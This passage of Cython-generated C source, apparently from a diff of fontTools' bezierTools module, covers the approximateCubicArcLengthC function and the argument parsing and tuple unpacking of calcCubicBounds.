*__pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4) { - double __pyx_v_v0; - double __pyx_v_v1; - double __pyx_v_v2; - double __pyx_v_v3; - double __pyx_v_v4; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - 
__Pyx_RefNannySetupContext("approximateCubicArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":393 - * # abs(BezierCurveC[3].diff(t).subs({t:T})) for T in sorted(0, .5(3/7)**.5/2, .5, 1), - * # weighted 1/20, 49/180, 32/90, 49/180, 1/20 respectively. - * v0 = abs(pt2 - pt1) * 0.15 # <<<<<<<<<<<<<< - * v1 = abs( - * -0.558983582205757 * pt1 - */ - __pyx_v_v0 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1)) * 0.15); - - /* "fontTools/misc/bezierTools.py":394 - * # weighted 1/20, 49/180, 32/90, 49/180, 1/20 respectively. - * v0 = abs(pt2 - pt1) * 0.15 - * v1 = abs( # <<<<<<<<<<<<<< - * -0.558983582205757 * pt1 - * + 0.325650248872424 * pt2 - */ - __pyx_v_v1 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.558983582205757, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.325650248872424, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.208983582205757, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.024349751127576, 0), __pyx_v_pt4))); - - /* "fontTools/misc/bezierTools.py":400 - * + 0.024349751127576 * pt4 - * ) - * v2 = abs(pt4 - pt1 + pt3 - pt2) * 0.26666666666666666 # <<<<<<<<<<<<<< - * v3 = abs( - * -0.024349751127576 * pt1 - */ - __pyx_v_v2 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt1), __pyx_v_pt3), __pyx_v_pt2)) * 0.26666666666666666); - - /* "fontTools/misc/bezierTools.py":401 - * ) - * v2 = abs(pt4 - pt1 + pt3 - pt2) * 0.26666666666666666 - * v3 = abs( # <<<<<<<<<<<<<< - * -0.024349751127576 * pt1 - * - 0.208983582205757 * pt2 - */ - __pyx_v_v3 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__Pyx_c_diff_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.024349751127576, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.208983582205757, 0), __pyx_v_pt2)), 
__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.325650248872424, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.558983582205757, 0), __pyx_v_pt4))); - - /* "fontTools/misc/bezierTools.py":407 - * + 0.558983582205757 * pt4 - * ) - * v4 = abs(pt4 - pt3) * 0.15 # <<<<<<<<<<<<<< - * - * return v0 + v1 + v2 + v3 + v4 - */ - __pyx_v_v4 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt3)) * 0.15); - - /* "fontTools/misc/bezierTools.py":409 - * v4 = abs(pt4 - pt3) * 0.15 - * - * return v0 + v1 + v2 + v3 + v4 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyFloat_FromDouble(((((__pyx_v_v0 + __pyx_v_v1) + __pyx_v_v2) + __pyx_v_v3) + __pyx_v_v4)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 409, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. 
- * - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_22calcCubicBounds, "calcCubicBounds(pt1, pt2, pt3, pt4)\nCalculates the bounding rectangle for a cubic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcCubicBounds((0, 0), (25, 100), (75, 100), (100, 0))\n (0, 0, 100, 75.0)\n >>> calcCubicBounds((0, 0), (50, 0), (100, 50), (100, 100))\n (0.0, 0.0, 100, 100)\n >>> print(\"%f %f %f %f\" % calcCubicBounds((50, 0), (0, 100), (100, 100), (50, 0)))\n 35.566243 0.000000 64.433757 75.000000\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_23calcCubicBounds = {"calcCubicBounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_22calcCubicBounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - 
__Pyx_RefNannySetupContext("calcCubicBounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 1); __PYX_ERR(0, 412, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 2); __PYX_ERR(0, 412, 
__pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 3); __PYX_ERR(0, 412, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicBounds") < 0)) __PYX_ERR(0, 412, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 412, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - 
__Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_ax3 = NULL; - PyObject *__pyx_v_ay3 = NULL; - PyObject *__pyx_v_bx2 = NULL; - PyObject *__pyx_v_by2 = NULL; - PyObject *__pyx_v_xRoots = NULL; - PyObject *__pyx_v_yRoots = NULL; - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_points = NULL; - PyObject *__pyx_8genexpr1__pyx_v_t = NULL; - PyObject *__pyx_8genexpr2__pyx_v_t = NULL; - PyObject *__pyx_8genexpr3__pyx_v_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - Py_ssize_t __pyx_t_11; - PyObject *(*__pyx_t_12)(PyObject *); - int __pyx_t_13; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicBounds", 1); - - /* "fontTools/misc/bezierTools.py":430 - * 35.566243 0.000000 64.433757 75.000000 - * """ - * (ax, ay), (bx, by), (cx, cy), (dx, dy) = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * # calc first derivative - * ax3 = ax * 3.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if 
CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - 
PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_7 = PyList_GET_ITEM(sequence, 0); - __pyx_t_9 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_7 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = 
PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - index = 1; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ax = __pyx_t_7; - __pyx_t_7 = 0; - __pyx_v_ay = __pyx_t_9; - __pyx_t_9 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_9 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_9 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - 
__Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - index = 1; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_bx = __pyx_t_9; - __pyx_t_9 = 0; - __pyx_v_by = __pyx_t_7; - __pyx_t_7 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_5))) || (PyList_CheckExact(__pyx_t_5))) { - PyObject* sequence = __pyx_t_5; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_7 = PyList_GET_ITEM(sequence, 0); - __pyx_t_9 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_7 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PySequence_ITEM(sequence, 1); if 
(unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - index = 1; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_cx = __pyx_t_7; - __pyx_t_7 = 0; - __pyx_v_cy = __pyx_t_9; - __pyx_t_9 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_6))) || (PyList_CheckExact(__pyx_t_6))) { - PyObject* sequence = __pyx_t_6; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 430, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_9 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_9 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 430, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_10 = PyObject_GetIter(__pyx_t_6); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 430, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - index = 0; __pyx_t_9 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_9)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - index = 1; __pyx_t_7 = __pyx_t_8(__pyx_t_10); if (unlikely(!__pyx_t_7)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_10), 2) < 0) __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 430, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __pyx_v_dx = 